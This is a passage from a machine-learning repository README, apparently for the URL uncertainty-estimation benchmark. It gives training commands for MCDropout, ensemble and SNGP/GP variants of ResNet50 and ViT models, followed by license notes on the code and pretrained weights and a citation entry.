--model=vit_medium_patch16_gap_256 --unc-module=pred-net --unc_start_value=0.001 ``` ### MCDropout Specify the number of MC samples to take via ```--num-heads``` and the dropout rate via ```--drop```. ``` train.py --drop=0.08702220252645132 --inv_temp=29.31590841184109 --loss=cross-entropy --lr-base=0.00016199535513680024 --model=resnet50dropout --unc-module=jsd --unc_start_value=0 ``` ``` train.py --drop=0.1334044009405148 --img-size=256 --inv_temp=57.13603169495254 --loss=cross-entropy --lr-base=0.0027583475549166764 --model=vit_medium_patch16_gap_256dropout --unc-module=class-entropy --unc_start_value=0 ``` ### Ensemble Specify the number heads via ```--num-heads```. This increases memory and computation usage. ``` train.py --inv_temp=29.89825063351814 --loss=cross-entropy --lr-base=0.004405890102835956 --model=resnet50 --num-heads=10 --unc-module=class-entropy --unc_start_value=0 ``` ``` train.py --img-size=256 --inv_temp=54.435826404570726 --loss=cross-entropy --lr-base=0.004944771531139904 --model=vit_medium_patch16_gap_256 --num-heads=10 --unc-module=class-entropy --unc_start_value=0 ``` ### Spectral-normalized Neural Gaussian Processes (SNGP/GP) SNGP has mutiple hyperparameters. Our implementation follows the defaults of the original paper. Most importantly, ```--use-spec-norm``` controls whether to use SNGP or drop the SN and only use GP. Like HET-XL, SNGP is called via a modified model architecture and otherwise uses a standard cross entropy loss. ``` train.py --gp-cov-discount-factor=-1 --gp-input-normalization=True --loss=cross-entropy --lr-base=0.003935036929170965 --model=resnet50sngp --spec-norm-bound=3.0034958778109893 --unc-module=class-entropy --unc_start_value=0 --use-spec-norm=True ``` ``` train.py --gp-cov-discount-factor=0.999 --gp-input-normalization=True --img-size=256 --loss=cross-entropy --lr-base=0.0002973866135608272 --model=vit_medium_patch16_gap_256sngp --spec-norm-bound=2.0072013733952883 --unc-module=class-entropy --unc_start_value=0 --use-spec-norm=False ``` --- ## Licenses ### Code This repo bases largely on [timm](https://github.com/huggingface/pytorch-image-models) (Apache 2.0), with some dataloaders from [Revisiting Deep Metric Learning](https://github.com/Confusezius/Revisiting_Deep_Metric_Learning_PyTorch) (MIT Licence), and some methods from [Probabilistic Contrastive Learning](https://github.com/mkirchhof/Probabilistic_Contrastive_Learning) (MIT License). Several further methods are (re-)implemented by ourselves. Overall, this repo is thus under an Apache 2.0 License. That said, it is your responsibility to ensure you comply with licenses here and conditions of any dependent licenses. Where applicable, the sources/references for various components are linked in docstrings. ### Pretrained Weights So far all of the pretrained weights available here are pretrained on ImageNet with a select few that have some additional pretraining (see extra note below). ImageNet was released for non-commercial research purposes only (https://image-net.org/download). It's not clear what the implications of that are for the use of pretrained weights from that dataset. Any models I have trained with ImageNet are done for research purposes and one should assume that the original dataset license applies to the weights. It's best to seek legal advice if you intend to use the pretrained weights in a commercial product. #### Pretrained on more than ImageNet Several weights included or references here were pretrained with proprietary datasets that I do not have access to. These include the Facebook WSL, SSL, SWSL ResNe(Xt) and the Google Noisy Student EfficientNet models. The Facebook models have an explicit non-commercial license (CC-BY-NC 4.0, https://github.com/facebookresearch/semi-supervised-ImageNet1K-models, https://github.com/facebookresearch/WSL-Images). The Google models do not appear to have any restriction beyond the Apache 2.0 license (and ImageNet concerns). In either case, you should contact Facebook or Google with any questions. --- ## Citing ``` @article{kirchhof2023url, title={URL: A Representation Learning Benchmark for Transferable Uncertainty Estimates}, author={Michael Kirchhof and Bálint Mucsányi and Seong Joon Oh and Enkelejda Kasneci}, journal={arXiv preprint arXiv:2307.03810}, year={2023} } ``` If you use the benchmark, please also cite the datasets.
End of preview. Expand in Data Studio

Dataset Card for "github_july_week1_2023"

More Information needed

Downloads last month
8